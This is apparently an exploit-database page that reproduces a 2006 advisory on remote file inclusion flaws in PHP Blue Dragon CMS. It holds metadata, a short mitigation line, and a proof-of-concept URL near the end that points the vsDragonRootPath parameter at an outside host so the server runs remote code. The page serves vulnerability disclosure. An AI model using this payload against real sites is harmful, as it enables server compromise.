header-logo
Suggest Exploit
vendor:
PHP Blue Dragon CMS
by:
SecurityFocus
7.5
CVSS
HIGH
Remote File Inclusion
94
CWE
Product Name: PHP Blue Dragon CMS
Affected Version From: Not Specified
Affected Version To: Not Specified
Patch Exists: YES
Related CWE: CVE-2006-4010
CPE: a:php_blue_dragon:php_blue_dragon_cms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Not Specified
2006

PHP Blue Dragon CMS Multiple Remote File Inclusion Vulnerabilities

PHP Blue Dragon CMS is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input to the application. An attacker may leverage these issues to have an arbitrary remote file containing malicious script code execute in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/18609/info

PHP Blue Dragon CMS is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input to the application.

An attacker may leverage these issues to have an arbitrary remote file containing malicious script code execute in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system. Other attacks are also possible.

http://www.example.com/root_includes/root_modules/forum_admin.php?action=forum_move&template_redirect=yes&vsDragonRootPath=http://192.168.0.xx:9999/

Navigation

Suggest Exploit

Services By CQR